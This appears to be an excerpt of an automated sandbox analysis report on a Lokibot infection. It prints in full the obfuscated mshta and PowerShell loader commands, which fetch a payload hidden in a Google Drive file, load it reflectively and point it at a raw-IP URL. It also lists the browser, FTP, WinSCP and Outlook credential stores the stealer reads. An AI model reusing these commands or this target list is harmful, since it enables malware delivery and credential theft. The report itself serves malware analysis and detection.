ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfzenmi1tutgicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagigfezc10evbficagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfrmlosxrjt24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjmtw9ulkrsbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagigthrenpeuffdkgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagd3esc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagzkhusk9pqwdhtcx1aw50icagicagicagicagicagicagicagicagicagicagicagzmnmv0juwcxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbis2cpoycgicagicagicagicagicagicagicagicagicagicagicattmftrsagicagicagicagicagicagicagicagicagicagicagicj3tnztcexmrlp2iiagicagicagicagicagicagicagicagicagicagicagic1oyu1lu1bbq0ugicagicagicagicagicagicagicagicagicagicagicb0cu9kwvbrucagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicakvkq2yjvns0y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotgundyumtc4lje1ms82ni9zzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnb29kzm9ybwv3axrolnrjriisiirftny6qvbqrefuqvxzzwvtzxrozwjlc3r0agluz3n3axroz3jlyxruzwvkc3dpdghnby52ynmildasmck7c3rbcnqtu2xfzxaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagicaijgvodjpbufbeqvrbxhnlzw1ldghlymvzdhroaw5nc3dpdghncmvhdg5lzwrzd2l0agdvlnzicyi='+[char]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'jiaoicrtsevmbglkwzfdkyrzaevsbelkwzezxssnwccpicgoj2p2twltywdlvxjsid0gduniahr0chm6ly9kcml2zs5nb29nbguuy29tl3vjp2v4cg9ydd1kb3dubg9hzczpzd0xqulwz0pksnyxrjz2uzrzvu95ym5ilxnedlvoqll3dxigdunio2p2txdlyknsawvudca9ie5ldy1pymplyycrj3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7anznaw1hz2vcjysnexrljysncya9igp2txdlyknsawvudc5eb3dubg9hzerhjysndgeoanznaw1hz2vvcmwpo2p2twltywdlvgv4dca9ifttexn0zw0uvgv4dc5fbmnvzgluz106olvurjgur2v0u3ryaw5nkgp2twltywdlqnl0zxmpo2p2txn0yxj0rmxhzya9ihvdyjw8qkftrty0x1nuqvjupj51q2i7anznzw5kjysnrmxhzya9ihvdyjw8qkftrty0x0vord4+dunio2p2txn0yxj0sw5kzxggpsbqdk1pbwfnzvrlehqusw5kzxhpzihqdk1zdgfydezsywcpo2p2twvuzeluzgv4id0ganznaw1hz2vuzxh0jysnlkluzgv4t2ynkycoanznzw5krmxhzyk7anznc3rhcnrjbmrlecatz2ugmcatyw5kigp2twvuzeluzgv4ic1ndcbqdk1zdgfydeluzgv4o2p2txn0yxj0sw5kzxggkz0ganznc3rhcnrgbgfnlkxlbmd0adtqdk1iyxnlnjrmzw5ndgggpsbqdk1lbmrjjysnbmrlecatigp2txn0yxj0sw5kzscrj3g7anznymfzzty0q29tbwfuzca9igp2twltywdlvgv4dc5tdwjzdhjpbmcoanznc3rhcnrjbmrlecwganznymfzzty0tgvuz3rokttqdk0nkydiyxnlnjrszxzlcnnlzca9ic1qb2luichqdk1iyxnlnjrdb21tyw5kllrvq2hhckfycmf5kccrjykgbnjfiezvckvhjysny2gtt2jqzwn0ihsganznxyb9kvstms4ulshqdk1iyxnlnjrdb21tyw5klkxlbmd0acldo2p2twnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydf06okzyb21cyxnlnjrtdhjpbmcoanznymfzzty0umv2zxjzzwqpo2p2twxvywrlzefzc2vtymx5iccrjz0gw1n5jysnc3rlbs5szwzszwn0aw9ulkfzc2vtymx5xto6tg9hzchqdk1jb21tyw5kqnl0zxmpo2p2txzhau1ldghvzca9iftkbmxpyi5jty5ib21lxscrjy5hzxrnzxrob2qnkycodunivkfjdunikttqdk12ywlnzxrob2qusw52b2tlkgp2tw51bgwsieaodunidhh0licrj0dst0wnkydmlzy2lze1ms44nzeunjquodkxlycrjy86chr0ahvdjysnyiwgdunizgvzyxrpdmfkb3vdyiwgdunizgvzyscrj3rpdmfkb3vdyiwgdunizgvzyxrpdmfkb3vdyicrjywgduniyxnwbicrj2unkyd0x3jlz2jyb3dzzxjzdunilcb1q2jkzxnhdgl2ywrvdunilcb1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyxrpdmfkb3vdyix1q2jkzxnhdgl2ywrvdunilhvdymrlc2f0axzhzg91q2isdunizgvzyscrj3rpdmfkb3vdyix1q2ixdunilhvdymrlc2f0axzhzg91q2ipktsnks5szxbsqwnlkcdqdk0nlcckjykuumvwbefjzsgndunijyxbc1ryaw5hxvtjagfsxtm5ks5szxbsqwnlkchby2hhul0xmtarw2noyvjdmte0k1tjagfsxty5ksxbc1ryaw5hxvtjagfsxteynckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "& ( $shellid[1]+$shellid[13]+'x') (('jvmimageurl = ucbhttps://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur ucb;jvmwebclient = new-objec'+'t system.net.webclient;jvmimageb'+'yte'+'s = jvmwebclient.downloadda'+'ta(jvmimageurl);jvmimagetext = [system.text.encoding]::utf8.getstring(jvmimagebytes);jvmstartflag = ucb<<base64_start>>ucb;jvmend'+'flag = ucb<<base64_end>>ucb;jvmstartindex = jvmimagetext.indexof(jvmstartflag);jvmendindex = jvmimagetext'+'.indexof'+'(jvmendflag);jvmstartindex -ge 0 -and jvmendindex -gt jvmstartindex;jvmstartindex += jvmstartflag.length;jvmbase64length = jvmendi'+'ndex - jvmstartinde'+'x;jvmbase64command = jvmimagetext.substring(jvmstartindex, jvmbase64length);jvm'+'base64reversed = -join (jvmbase64command.tochararray('+') nre forea'+'ch-object { jvm_ })[-1..-(jvmbase64command.length)];jvmcommandbytes = [system.convert]::frombase64string(jvmbase64reversed);jvmloadedassembly '+'= [sy'+'stem.reflection.assembly]::load(jvmcommandbytes);jvmvaimethod = [dnlib.io.home]'+'.getmethod'+'(ucbvaiucb);jvmvaimethod.invoke(jvmnull, @(ucbtxt.'+'grol'+'l/66/151.871.64.891/'+'/:ptthuc'+'b, ucbdesativadoucb, ucbdesa'+'tivadoucb, ucbdesativadoucb'+', ucbaspn'+'e'+'t_regbrowsersucb, ucbdesativadoucb, ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesativadoucb,ucbdesa'+'tivadoucb,ucb1ucb,ucbdesativadoucb));').replace('jvm','$').replace('ucb',[string][char]39).replace(([char]110+[char]114+[char]69),[string][char]124))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Lokibot
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
          Tries to harvest and steal ftp login credentials
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
